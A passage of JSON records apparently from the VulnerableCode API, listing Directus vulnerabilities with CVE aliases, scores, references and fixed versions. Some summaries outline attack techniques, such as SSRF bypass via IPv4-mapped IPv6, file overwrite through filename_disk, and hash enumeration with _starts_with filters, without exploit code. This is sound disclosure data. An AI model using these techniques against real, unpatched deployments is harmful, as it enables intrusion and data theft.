"VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0" } ], "aliases": [ "CVE-2022-26969", "GHSA-g27j-74fp-xfpr", "GMS-2022-677" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8ch7-zwuu-zufp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71947?format=api", "vulnerability_id": "VCID-9dsr-kz3s-hkdx", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, when GRAPHQL_INTROSPECTION=false is configured, Directus correctly blocks standard GraphQL introspection queries (__schema, __type). However, the server_specs_graphql resolver on the /graphql/system endpoint returns an equivalent SDL representation of the schema and was not subject to the same restriction. This allowed the introspection control to be bypassed, exposing schema structure (collection names, field names, types, and relationships) to unauthenticated users at the public permission level, and to authenticated users at their permitted permission level. This vulnerability is fixed in 11.16.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35413", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04912", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04908", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05294", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05303", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35413" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35413", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35413" }, { "reference_url": "https://github.com/advisories/GHSA-wxwm-3fxv-mrvx", "reference_id": "GHSA-wxwm-3fxv-mrvx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wxwm-3fxv-mrvx" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx", "reference_id": "GHSA-wxwm-3fxv-mrvx", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:05:28Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373399?format=api", "purl": "pkg:npm/directus@11.16.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1" } ], "aliases": [ "CVE-2026-35413", "GHSA-wxwm-3fxv-mrvx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9dsr-kz3s-hkdx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/105805?format=api", "vulnerability_id": "VCID-9r91-qgfa-x7ak", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.12.0 and prior to version 11.9.0, Directus Flows with a manual trigger are not validating whether the user triggering the Flow has permissions to the items provided as payload to the Flow. Depending on what the Flow is set up to do this can lead to the Flow executing potential tasks on the attacker's behalf without authenticating. Bad actors could execute the manual trigger Flows without authentication, or access rights to the said collection(s) or item(s). Users with manual trigger Flows configured are impacted as these endpoints do not currently validate if the user has read access to `directus_flows` or to the relevant collection/items. The manual trigger Flows should have tighter security requirements as compared to webhook Flows where users are expected to perform do their own checks. Version 11.9.0 fixes the issue. As a workaround, implement permission checks for read access to Flows and read access to relevant collection/items.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53889", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00244", "scoring_system": "epss", "scoring_elements": "0.47989", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00244", "scoring_system": "epss", "scoring_elements": "0.48128", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00244", "scoring_system": "epss", "scoring_elements": "0.48144", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53889" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53889", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53889" }, { "reference_url": "https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb", "reference_id": "22be460c76957708d67fdd52846a9ad1cbb083fb", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/" } ], "url": "https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb" }, { "reference_url": "https://github.com/advisories/GHSA-7cvf-pxgp-42fc", "reference_id": "GHSA-7cvf-pxgp-42fc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7cvf-pxgp-42fc" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc", "reference_id": "GHSA-7cvf-pxgp-42fc", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.9.0", "reference_id": "v11.9.0", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.9.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/378353?format=api", "purl": "pkg:npm/directus@11.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0" } ], "aliases": [ "CVE-2025-53889", "GHSA-7cvf-pxgp-42fc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9r91-qgfa-x7ak" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/145589?format=api", "vulnerability_id": "VCID-9t8b-59vc-kbea", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. In versions prior to 9.16.0 users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes. Accounts cannot be taken over unless the hashes can be reversed which is unlikely with current hardware. This problem has been patched by preventing any hashed/concealed field to be filtered against with the `_starts_with` or other string operator in version 9.16.0. Users are advised to upgrade. Users unable to upgrade may mitigate this issue by ensuring that no user has `read` access to the `password` field in `directus_users`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-27481", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00301", "scoring_system": "epss", "scoring_elements": "0.53838", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00301", "scoring_system": "epss", "scoring_elements": "0.53967", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00301", "scoring_system": "epss", "scoring_elements": "0.53964", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00301", "scoring_system": "epss", "scoring_elements": "0.53981", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-27481" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27481", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27481" }, { "reference_url": "https://github.com/directus/directus/pull/14829", "reference_id": "14829", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/" } ], "url": "https://github.com/directus/directus/pull/14829" }, { "reference_url": "https://github.com/directus/directus/pull/15010", "reference_id": "15010", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/" } ], "url": "https://github.com/directus/directus/pull/15010" }, { "reference_url": "https://github.com/advisories/GHSA-m5q3-8wgf-x8xf", "reference_id": "GHSA-m5q3-8wgf-x8xf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m5q3-8wgf-x8xf" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf", "reference_id": "GHSA-m5q3-8wgf-x8xf", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/381015?format=api", "purl": "pkg:npm/directus@9.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.16.0" } ], "aliases": [ "CVE-2023-27481", "GHSA-m5q3-8wgf-x8xf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9t8b-59vc-kbea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/73167?format=api", "vulnerability_id": "VCID-a1y7-cmk1-4ffn", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, the PATCH /files/{id} endpoint accepts a user-controlled filename_disk parameter. By setting this value to match the storage path of another user's file, an attacker can overwrite that file's content while manipulating metadata fields such as uploaded_by to obscure the tampering. This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39942", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12364", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12342", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12266", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12358", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39942" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39942", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39942" }, { "reference_url": "https://github.com/advisories/GHSA-393c-p46r-7c95", "reference_id": "GHSA-393c-p46r-7c95", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-393c-p46r-7c95" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95", "reference_id": "GHSA-393c-p46r-7c95", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.17.0", "reference_id": "v11.17.0", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.17.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-39942", "GHSA-393c-p46r-7c95" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a1y7-cmk1-4ffn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71560?format=api", "vulnerability_id": "VCID-ah8z-vr21-wfd6", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.0, a Server-Side Request Forgery (SSRF) protection bypass has been identified and fixed in Directus. The IP address validation mechanism used to block requests to local and private networks could be circumvented using IPv4-Mapped IPv6 address notation. This vulnerability is fixed in 11.16.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35409", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02707", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02712", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.0398", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03969", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35409" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35409", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35409" }, { "reference_url": "https://github.com/advisories/GHSA-wv3h-5fx7-966h", "reference_id": "GHSA-wv3h-5fx7-966h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wv3h-5fx7-966h" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h", "reference_id": "GHSA-wv3h-5fx7-966h", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:04:19Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373510?format=api", "purl": "pkg:npm/directus@11.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.0" } ], "aliases": [ "CVE-2026-35409", "GHSA-wv3h-5fx7-966h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ah8z-vr21-wfd6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/134660?format=api", "vulnerability_id": "VCID-b8ya-2bmn-e3h5", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.3, the `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. This issue is patched in version 9.23.3.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-28443", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19287", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19453", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19457", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19477", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-28443" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28443", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28443" }, { "reference_url": "https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc", "reference_id": "349536303983ccba68ecb3e4fb35315424011afc", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/" } ], "url": "https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc" }, { "reference_url": "https://github.com/advisories/GHSA-8vg2-wf3q-mwv7", "reference_id": "GHSA-8vg2-wf3q-mwv7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8vg2-wf3q-mwv7" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7", "reference_id": "GHSA-8vg2-wf3q-mwv7", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7" }, { "reference_url": 